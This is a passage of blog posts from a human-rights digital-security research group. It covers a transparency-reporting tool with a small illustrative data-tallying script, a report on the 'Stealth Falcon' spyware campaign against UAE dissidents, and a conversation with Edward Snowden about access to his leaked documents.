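To give a sense of what such structured reporting involves, here is a minimal sketch of the kind of per-authority aggregation a transparency report presents. The field names and figures are hypothetical, invented for illustration; they are not the actual DIY tool’s format:

```python
# Hypothetical sketch: tally government data requests per lawful authority,
# the kind of aggregate figure a transparency report discloses.
# All record fields and values below are invented for illustration.

sample_requests = [
    {"authority": "court order", "complied": True},
    {"authority": "court order", "complied": False},
    {"authority": "warrantless request", "complied": True},
]

def summarize(records):
    """For each lawful authority, count requests received and complied with."""
    summary = {}
    for r in records:
        s = summary.setdefault(r["authority"], {"received": 0, "complied": 0})
        s["received"] += 1
        s["complied"] += int(r["complied"])
    return summary

print(summarize(sample_requests))
```

The value of a shared template is that every company aggregating its figures the same way makes reports comparable across the industry.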

The world of Big Data has come upon us like a hurricane, with most consumers bewildered by what is happening to the data they routinely give away.  Meanwhile, companies are reaping a harvest of highly-personalized information to generate enormous profits, with very little public accountability around their conduct, or the design choices they make.  It’s time we encouraged consumers to “lift the lid” on the Big Data ecosystem right down to the algorithms that sort us and structure our choices, while simultaneously pressing companies to be more responsible stewards of our data.  Tools like “Access My Info” and the DIY Transparency Toolkit are a good first step.

A Stealth Falcon Quietly Snatches Its Twitter Prey

Today, the Citizen Lab is publishing a new report, entitled “Be Calm and (Don’t) Enable Macros: Malware Sent to UK Journalist Exposes New Threat Actor Targeting UAE Dissidents.” The report is authored by Citizen Lab senior researchers Bill Marczak and John Scott Railton, and details an extensive and highly elaborate targeted digital attack campaign, which we call “Stealth Falcon.” While we have no “smoking gun” (typical for cyber espionage), there is a lot of circumstantial evidence that strongly suggests the United Arab Emirates is responsible for Stealth Falcon.

The New York Times has an exclusive on the report, which can be found here http://www.nytimes.com/2016/05/30/technology/governments-turn-to-commercial-spyware-to-intimidate-dissidents.html?_r=0

Our full report is here: https://citizenlab.org/2016/05/stealth-falcon/

Journalists, activists — in fact, all of civil society — now depend on and have benefited from social media to conduct their campaigns and communicate with each other, and with confidential sources.  Yet that same dependence on social media has become a principal point of exposure and risk, exploited by criminals, intelligence agencies, and other adversaries determined to silence dissent. Our report offers a shocking exposé of just how elaborate and shifty these campaigns can be, and how serious the consequences are for those ensnared in them.

The Stealth Falcon case began when Rori Donaghy, a UK-based journalist and founder of the Emirates Center for Human Rights, received an email in November 2015 purporting to offer him a position on a human rights panel.  That email contained a malware-laden attachment from a phony organization. Donaghy has published extensively on abuses by the UAE government, including a series of articles based on leaked emails involving UAE government members.  Sensing that something was awry, Donaghy made the wise move to share his email with Citizen Lab researcher Bill Marczak.

Using a combination of reverse engineering, network scanning, and other highly intricate detective methods that are detailed in the report, Marczak (assisted by John Scott Railton) unearthed a vast campaign of digital attacks aimed at UAE dissidents, organized primarily through fake Twitter accounts, phony websites, and spoofed emails.  The attacks appear to have had extremely serious consequences: many dissidents targeted, and presumably entrapped by Stealth Falcon, disappeared into the clutches of UAE authorities and were reportedly tortured.

The United Arab Emirates is an autocratic regime that governs with strict regulations and harsh punishments.  Human Rights Watch’s 2016 UAE country report documents arbitrary arrests and forcible disappearances of regime critics.  Amnesty International says that “torture and other ill-treatment of detainees was common” in UAE prisons.  The UAE has long strictly censored the Internet using technology developed by Western companies; earlier Citizen Lab research found the services of a Canadian company, Netsweeper, are used by UAE ISPs to restrict access to content critical of the regime.  The UAE has also purchased “lawful intercept” surveillance systems from the notorious FinFisher and Hacking Team intrusion software vendors, as we have documented in prior reports.  It is not yet clear whether what we call “Stealth Falcon” is something the UAE developed itself, or whether it’s part of some kind of commercial service.  Regardless, it is a nasty reminder of the way the harsh world of realpolitik actually manifests itself in cyberspace.

There are at least two broader lessons of the Stealth Falcon report. First, the careful, rigorous methods demonstrated by Bill Marczak and John Scott Railton are exemplary of the power of applying structured research techniques drawn from engineering and computer science to issues of human rights.  We hope other University-based research groups are inspired by this mixed methods approach, and emulate what we are doing around documenting targeted digital attacks.  The more this type of research is “normalized” in academia, the less likely abuses of the sort we are unearthing will go unnoticed.

Second, it is clear that autocratic regimes like the United Arab Emirates are now routinely finding ways to project their power through cyberspace by subverting the tools of social media to accomplish their sinister aims. Given that civil society is so deeply immersed in social media, it is imperative that they, and the companies that service them, urgently adapt to and mitigate these new threats. Doing so will require a more mature awareness of the risks that exist in cyberspace, knowing what to be “on the lookout for” when it comes to those risks, and adjusting behaviour accordingly.  Although there were many victims of Stealth Falcon, Donaghy himself was not among them, thanks to his astute recognition that a pleasant, but out-of-the-blue, invitation seemed not quite right.

My conversation with Edward Snowden

Earlier this week, I was fortunate to have a lengthy conversation with Edward Snowden.  The chat was held at RightsCon and moderated by Access’ Amie Stepanovich, and it is archived at the RightsCon website here: https://www.youtube.com/watch?v=yGDqXokPGiE

We covered many topics, and I learned a great deal about Ed’s positions, and also about his eloquence and passion.  It is clear he has deeply held and sophisticated perspectives on security, rights, and freedom.  It is remarkable that the most important whistleblower in the history of intelligence also happens to be so thoughtful and articulate.

We spoke about the Internet rights community, and the challenges of extending the values of that community to the broader public in a context where big data and state surveillance are overwhelmingly dominant.  I made the case for the value of evidence-based, mixed methods University research of the sort that Citizen Lab does to bring transparency and support human rights advocacy.  I described the various fellowship opportunities, and even recommended Ed apply for one as a remote fellow. 🙂

We also spoke about the status of the Snowden disclosures moving forward.  It is clear Ed thought carefully about how best to avoid prejudice concerning the analysis of the documents. Handing them over to third parties makes sense.  But now, the documents are largely in the possession of a single media organization and the process around access to them for outside interested parties is opaque and lacking in explicit rules that we can all acknowledge.  Opening the entire cache up to the public, on the other hand, would be irresponsible since there is still sensitive information in them that could put lives at risk.

A different model I proposed is to create a respected, independent international advisory board that would oversee and adjudicate applications to the archives from journalists and researchers. Ed responded that discussions had been held with a University about taking the documents, but the University was naturally concerned about the liabilities of handling them. But I believe that conflates two separate issues. Here we need to separate the physical location of the documents from the process of how to get access to them.  It does not matter where the documents are archived — whether that be in one or several locations — as long as they are secure.  What matters more is the process by which decisions are made as to who gets access to them.  Right now, it’s a bit of a mystery and based largely on personal connections revolving around one or two journalists and a few editors of a private company.  Moving forward, that needs to change.  It’s a matter of global public interest.

Thanks to Access Now for archiving it here: https://www.youtube.com/watch?v=yGDqXokPGiE